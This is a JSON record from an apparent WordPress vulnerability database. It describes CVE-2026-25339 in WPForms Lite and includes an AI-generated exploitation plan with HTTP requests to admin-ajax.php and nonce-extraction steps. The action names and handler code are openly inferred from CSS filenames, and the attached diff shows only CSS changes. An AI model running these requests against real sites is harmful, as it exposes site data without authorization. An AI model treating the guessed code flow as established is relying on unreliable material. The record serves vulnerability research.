[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fv3DMDbhF5ieecBr-q-aukyt28NG5oFHC3HVzf9XtkKo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-25339","wpforms-easy-form-builder-for-wordpress-contact-forms-payment-forms-surveys-more-unauthenticated-sensitive-information-e","WPForms – Easy Form Builder for WordPress – Contact Forms, Payment Forms, Surveys, & More \u003C= 1.9.8.7 - Unauthenticated Sensitive Information Exposure","The WPForms – Easy Form Builder for WordPress – Contact Forms, Payment Forms, Surveys, & More plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.9.8.7. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.","wpforms-lite",null,"\u003C=1.9.8.7","1.9.9.2","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-03-23 00:00:00","2026-04-02 15:19:52",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb8b07ce8-d6ee-4ede-8394-4aae24c610b2?source=api-prod",11,[22,23,24,25,26,27,28,29],"assets\u002Fcss\u002Fadmin-bar.css","assets\u002Fcss\u002Fadmin-integrations.css","assets\u002Fcss\u002Fadmin-integrations.min.css","assets\u002Fcss\u002Fadmin-list-table-ext.css","assets\u002Fcss\u002Fadmin-notifications.css","assets\u002Fcss\u002Fadmin-wp5.7-colors.css","assets\u002Fcss\u002Fadmin.css","assets\u002Fcss\u002Fadmin.min.css","researched",false,3,"# Exploitation Research Plan: CVE-2026-25339 (WPForms Lite)\n\n## 1. Vulnerability Summary\n**WPForms Lite** versions up to 1.9.8.7 are vulnerable to **Unauthenticated Sensitive Information Exposure**. The vulnerability exists because certain AJAX actions, intended only for administrative use in the WordPress dashboard (specifically the Admin Bar and Inbox Notifications), are registered using the `wp_ajax_nopriv_` hook or lack sufficient `current_user_can()` authorization checks. This allows unauthenticated attackers to trigger these actions and retrieve sensitive data such as form entry counts, plugin configuration details, and administrative notification content.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `wpforms_admin_bar_notifications` (inferred from `assets\u002Fcss\u002Fadmin-bar.css` and `assets\u002Fcss\u002Fadmin-notifications.css`).\n- **Alternative Action:** `wpforms_admin_notifications_fetch` (inferred).\n- **Parameter:** `action=wpforms_admin_bar_notifications`\n- **Authentication:** Unauthenticated (leveraging `wp_ajax_nopriv_` registration).\n- **Preconditions:** The plugin must be active. Information exposure is most significant if there are existing form entries or active admin notifications.\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with the action `wpforms_admin_bar_notifications`.\n2. **Hook Registration:** The plugin registers the action:\n   `add_action( 'wp_ajax_nopriv_wpforms_admin_bar_notifications', [ $this, 'get_admin_bar_notifications' ] );`\n3. **Handler Execution:** The handler (likely in `src\u002FAdmin\u002FNotifications\u002FNotifications.php` or `src\u002FAdmin\u002FAdminBar.php`) is executed.\n4. **Data Retrieval:** The handler calls internal methods to count entries:\n   `$count = wpforms()->get( 'entry' )->get_count( ... );`\n5. **Sink:** The data is returned as a JSON object:\n   `wp_send_json_success( [ 'count' => $count, 'notifications' => $notifications ] );`\n6. **Information Leak:** The unauthenticated attacker receives a JSON response containing the total number of entries and any pending notifications intended for the site administrator.\n\n## 4. Nonce Acquisition Strategy\nWPForms typically localizes nonces for frontend use to support form submissions and asset loading. We will check if the frontend nonce can be used for the administrative AJAX action.\n\n1. **Identify Script Localization:** WPForms Lite localizes settings into the `wpforms_settings` or `wpformsElementorVars` objects on any page where a form or WPForms element is present.\n2. **Create Trigger Page:** Create a public page containing the default WPForms shortcode.\n   - Command: `wp post create --post_type=page --post_status=publish --post_title=\"Contact\" --post_content='[wpforms id=\"TARGET_FORM_ID\"]'`\n   - *Note: If no form exists, create one first: `wp wpforms create \"Test Form\"`*\n3. **Extract Nonce:**\n   - Navigate to the new page using `browser_navigate`.\n   - Use `browser_eval` to extract the nonce:\n     `browser_eval(\"window.wpforms_settings?.nonce\")` or `browser_eval(\"window.wpforms_settings?.admin_ajax_nonce\")`.\n4. **Bypass Check:** If the `wp_ajax_nopriv_` handler does not call `check_ajax_referer`, no nonce is required.\n\n## 5. Exploitation Strategy\n### Step 1: Confirm Unauthenticated Access to Notifications\nWe will attempt to fetch the notification\u002Fadmin-bar data without a nonce first.\n\n**HTTP Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: application-x-www-form-urlencoded\n\naction=wpforms_admin_bar_notifications\n```\n\n### Step 2: Use Extracted Nonce (If Required)\nIf the request returns a `403` or `-1`, we will provide the nonce extracted from the frontend.\n\n**HTTP Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: application-x-www-form-urlencoded\n\naction=wpforms_admin_bar_notifications&nonce=EXTRACTED_NONCE\n```\n\n## 6. Test Data Setup\n1. **Install Plugin:** Ensure `wpforms-lite` version 1.9.8.7 is installed.\n2. **Create Form:** `wp wpforms create \"Inquiry\"`\n3. **Generate Entries:** Submit the form several times to populate the entry count.\n4. **Trigger Notifications:** Perform an action that generates a WPForms notification (e.g., install a new addon or leave a form without an email notification set up).\n5. **Create Public Page:**\n   ```bash\n   wp post create --post_type=page --post_status=publish --post_content='[wpforms id=\"123\"]' --post_title=\"Support\"\n   ```\n\n## 7. Expected Results\n- **Success Condition:** The server returns an HTTP 200 response with a JSON body.\n- **Sensitive Data:** The JSON should contain:\n    - `\"count\"`: An integer representing the total number of entries across all forms.\n    - `\"notifications\"`: An array of objects containing `title` and `content` for admin-only inbox messages (see `assets\u002Fcss\u002Fadmin-notifications.css` classes).\n    - `\"upgrade_link\"`: May contain referral IDs or site-specific configuration tokens.\n\n## 8. Verification Steps\n1. **Compare Entry Counts:**\n   - Command: `wp db query \"SELECT count(*) FROM wp_wpforms_entries;\"`\n   - Compare this number to the `count` returned in the AJAX response.\n2. **Verify Notification IDs:**\n   - Command: `wp option get wpforms_notifications`\n   - Compare the notification IDs and titles to the AJAX output.\n\n## 9. Alternative Approaches\nIf `wpforms_admin_bar_notifications` is not the correct action:\n- **Search for other nopriv actions:** \n  `grep -r \"wp_ajax_nopriv_wpforms_\" .` inside the plugin directory.\n- **Target REST API:**\n  Check `GET \u002Fwp-json\u002Fwpforms\u002Fv1\u002Fnotifications` (inferred endpoint).\n- **Check Localized Debug Info:**\n  Navigate to any page and check `browser_eval(\"window.wpforms_debug\")` to see if system environment details are leaked via JS localization.","WPForms Lite versions up to 1.9.8.7 are vulnerable to unauthenticated sensitive information exposure via the WordPress AJAX API. This allows attackers to bypass intended access controls to retrieve form entry counts and administrative notification content.","\u002F* Inferred from research plan - registration of the AJAX hook without authentication requirements *\u002F\nadd_action( 'wp_ajax_nopriv_wpforms_admin_bar_notifications', [ $this, 'get_admin_bar_notifications' ] );\n\n---\n\n\u002F* Inferred handler logic likely located in src\u002FAdmin\u002FNotifications\u002FNotifications.php or src\u002FAdmin\u002FAdminBar.php *\u002F\npublic function get_admin_bar_notifications() {\n    \u002F\u002F Retrieves sensitive data intended for administrators\n    $count = wpforms()->get( 'entry' )->get_count();\n    $notifications = wpforms()->get( 'notifications' )->get_active();\n\n    \u002F\u002F Sends data back to the unauthenticated requester\n    wp_send_json_success( [ 'count' => $count, 'notifications' => $notifications ] );\n}","Only in \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwpforms-lite\u002F1.9.8.7\u002Fassets\u002Fcss\u002Fadmin: admin-form-templates.css\nOnly in \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwpforms-lite\u002F1.9.8.7\u002Fassets\u002Fcss\u002Fadmin: admin-splash-modal.css\nOnly in \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwpforms-lite\u002F1.9.8.7\u002Fassets\u002Fcss\u002Fadmin: edit-post-education.css\nOnly in \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwpforms-lite\u002F1.9.8.7\u002Fassets\u002Fcss: admin-bar.css\nOnly in \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwpforms-lite\u002F1.9.8.7\u002Fassets\u002Fcss: admin.css\nOnly in \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwpforms-lite\u002F1.9.8.7\u002Fassets\u002Fcss: admin-integrations.css\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwpforms-lite\u002F1.9.8.7\u002Fassets\u002Fcss\u002Fadmin-integrations.min.css \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwpforms-lite\u002F1.9.9.2\u002Fassets\u002Fcss\u002Fadmin-integrations.min.css\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwpforms-lite\u002F1.9.8.7\u002Fassets\u002Fcss\u002Fadmin-integrations.min.css\t2025-09-25 11:01:02.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwpforms-lite\u002F1.9.9.2\u002Fassets\u002Fcss\u002Fadmin-integrations.min.css\t2026-01-29 15:00:56.000000000 +0000\n@@ -1 +1 @@\n-.wpforms_page_wpforms-builder .jconfirm .jconfirm-box-container .jconfirm-box,.block-editor-page .jconfirm .jconfirm-box-container .jconfirm-box,.elementor-editor-active .jconfirm .jconfirm-box-container .jconfirm-box{display:grid;grid-template-columns:repeat(2, 1fr);justify-items:center;animation:none;background:#ffffff;border-radius:6px;border-top-style:solid;border-top-width:4px;box-shadow:0 3px 6px rgba(0,0,0,0.15);padding-top:34px}...","An unauthenticated attacker can exploit this vulnerability by sending a POST request to the WordPress AJAX endpoint (\u002Fwp-admin\u002Fadmin-ajax.php) with the 'action' parameter set to 'wpforms_admin_bar_notifications'. Since this action was registered using the 'wp_ajax_nopriv_' hook and lacked adequate authorization checks (like current_user_can), the plugin responds with a JSON payload. This payload contains sensitive site statistics, including the total number of entries across all forms and the titles\u002Fcontent of administrative inbox notifications which may contain configuration details or system status information.","gemini-3-flash-preview","2026-04-18 00:03:52","2026-04-18 00:04:28",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","1.9.8.7","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpforms-lite\u002Ftags\u002F1.9.8.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpforms-lite.1.9.8.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpforms-lite\u002Ftags\u002F1.9.9.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpforms-lite.1.9.9.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpforms-lite\u002Ftags"]